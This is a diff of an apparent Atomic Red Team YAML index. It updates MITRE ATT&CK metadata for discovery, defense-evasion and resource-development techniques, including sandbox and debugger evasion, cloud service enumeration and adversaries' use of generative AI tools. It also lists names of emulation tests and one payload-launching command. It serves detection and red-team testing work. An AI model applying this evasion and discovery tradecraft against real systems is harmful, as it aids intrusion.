@@ -105258,41 +105948,7 @@ discovery:
         elevation_required: false
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -105316,6 +105972,9 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -105326,9 +105985,14 @@ discovery:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -105338,12 +106002,39 @@ discovery:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1069.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:14:42.184Z'
       name: 'Permission Groups Discovery: Local Groups'
       description: |-
         Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -105386,7 +106077,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.001
     atomic_tests:
     - name: Permission Groups Discovery (Local)
@@ -105538,7 +106228,7 @@ discovery:
         name: sh
   T1201:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:02:44.477Z'
       name: Password Policy Discovery
       description: |-
         Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -105549,28 +106239,31 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Regina Elwell
+      - Sudhanshu Chauhan, @Sudhanshu_C
+      - Isif Ibrahima, Mandiant
+      - Austin Clark, @c2defense
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor logs and processes for tools and command line arguments
         that may indicate they're being used for password policy discovery. Correlate
         that activity with other suspicious activity from the originating system to
         reduce potential false positives from valid user or administrator activity.
         Adversaries will likely attempt to find the password policy early in an operation
         and the activity is likely to happen with other Discovery activity.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - IaaS
       - Network
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.5'
-      x_mitre_contributors:
-      - Regina Elwell
-      - Sudhanshu Chauhan, @Sudhanshu_C
-      - Isif Ibrahima, Mandiant
-      - Austin Clark, @c2defense
+      - Identity Provider
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Metadata'
       - 'Command: Command Execution'
@@ -105603,9 +106296,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1201
     atomic_tests:
     - name: Examine password complexity policy - Ubuntu
@@ -105833,7 +106525,7 @@ discovery:
         description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
           the Doppelgänging technique. Retrieved May 22, 2018.
         url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:00:56.174Z'
       name: 'System Location Discovery: System Language Discovery'
       description: "Adversaries may attempt to gather information about the system
         language of a victim in order to infer the geographical location of that host.
@@ -105872,8 +106564,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614.001
     atomic_tests:
     - name: Discover System Language by Registry Query
@@ -106028,7 +106718,7 @@ discovery:
         command: PathToAtomicsFolder\..\ExternalPayloads\LanguageKeyboardLayout.exe
   T1012:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:56:37.011Z'
       name: Query Registry
       description: |-
         Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -106069,7 +106759,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1012
     atomic_tests:
     - name: Query Registry
@@ -106218,82 +106907,81 @@ discovery:
           '
   T1614:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:07:23.511Z'
+      name: System Location Discovery
+      description: |2-
+
+        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Pooja Natarajan, NEC Corporation India
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Wes Hurd
       - Katie Nickels, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
+
+        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      - IaaS
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Process: OS API Execution'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
       created: '2021-04-01T16:42:08.735Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1614
         url: https://attack.mitre.org/techniques/T1614
-      - source_name: FBI Ragnar Locker 2020
-        url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
-        description: FBI. (2020, November 19). Indicators of Compromise Associated
-          with Ragnar Locker Ransomware. Retrieved April 1, 2021.
-      - source_name: Sophos Geolocation 2016
-        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
-        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
-          target you based on where you live. Retrieved April 1, 2021.'
+        external_id: T1614
       - source_name: Bleepingcomputer RAT malware 2020
-        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
         description: Abrams, L. (2020, October 23). New RAT malware gets commands
           via Discord, has ransomware feature. Retrieved April 1, 2021.
+        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
       - source_name: AWS Instance Identity Documents
-        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
         description: Amazon. (n.d.). Instance identity documents. Retrieved April
           2, 2021.
-      - source_name: Microsoft Azure Instance Metadata 2021
-        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
-        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
-          (Windows). Retrieved April 2, 2021.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
       - source_name: Securelist Trasparent Tribe 2020
-        url: https://securelist.com/transparent-tribe-part-1/98127/
         description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
           part 1. Retrieved April 1, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: System Location Discovery
-      description: |2-
-
-        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
-        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_detection: |-
-        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
-        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
-
-        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
-      x_mitre_version: '1.0'
+        url: https://securelist.com/transparent-tribe-part-1/98127/
+      - source_name: FBI Ragnar Locker 2020
+        description: FBI. (2020, November 19). Indicators of Compromise Associated
+          with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+        url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+      - source_name: Microsoft Azure Instance Metadata 2021
+        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+          (Windows). Retrieved April 2, 2021.
+        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+      - source_name: Sophos Geolocation 2016
+        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+          target you based on where you live. Retrieved April 1, 2021.'
+        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Process: OS API Execution'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614
     atomic_tests:
     - name: Get geolocation info through IP-Lookup services using curl Windows
@@ -106403,7 +107091,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518.001
     atomic_tests:
     - name: Security Software Discovery
@@ -106576,12 +107263,12 @@ discovery:
           '
   T1526:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Cloud Service Discovery
       description: |-
-        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
 
-        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
 
         For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
 
@@ -106589,10 +107276,12 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Praetorian
       - Thanabodi Phrakhun, I-SECURE
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -106601,15 +107290,16 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Enumeration'
+      - 'Logon Session: Logon Session Creation'
       type: attack-pattern
       id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
       created: '2019-08-30T13:01:10.120Z'
@@ -106637,9 +107327,6 @@ discovery:
         url: https://github.com/RhinoSecurityLabs/pacu
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1526
     atomic_tests:
     - name: Azure - Dump Subscription Data with MicroBurst
@@ -106774,7 +107461,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1018
     atomic_tests:
     - name: Remote System Discovery - net
@@ -107335,7 +108021,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1046
     atomic_tests:
     - name: Port Scan
@@ -107675,7 +108360,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518
     atomic_tests:
     - name: Find and Display Internet Explorer Browser Version
@@ -107755,7 +108439,7 @@ discovery:
         name: powershell
   T1538:
     technique:
-      modified: '2024-04-19T04:25:33.300Z'
+      modified: '2024-10-15T15:51:56.279Z'
       name: Cloud Service Dashboard
       description: |-
         An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -107776,12 +108460,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -107806,7 +108489,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1622:
     technique:
@@ -107861,7 +108543,7 @@ discovery:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -107881,7 +108563,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests:
     - name: Detect a Debugger Presence in the Machine
@@ -107996,7 +108677,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1124
     atomic_tests:
     - name: System Time Discovery
@@ -108072,7 +108752,7 @@ discovery:
 resource-development:
   T1583:
     technique:
-      modified: '2024-02-28T21:13:02.648Z'
+      modified: '2024-10-16T20:03:59.884Z'
       name: Acquire Infrastructure
       description: |-
         Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -108083,7 +108763,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider use of services that may aid in tracking of newly
         acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -108154,29 +108834,28 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.007:
     technique:
-      modified: '2022-10-20T21:20:22.578Z'
+      modified: '2024-07-01T20:24:16.562Z'
       name: Serverless
       description: |-
-        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
 
-        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -108200,15 +108879,18 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.007:
     technique:
-      modified: '2024-04-15T23:49:14.558Z'
+      modified: '2024-09-12T19:18:36.583Z'
       name: Artificial Intelligence
       description: |
         Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -108240,17 +108922,16 @@ resource-development:
         url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
       - source_name: OpenAI-CTI
         description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
-          by state-affiliated threat actors. Retrieved March 11, 2024.
-        url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+          by state-affiliated threat actors. Retrieved September 12, 2024.
+        url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
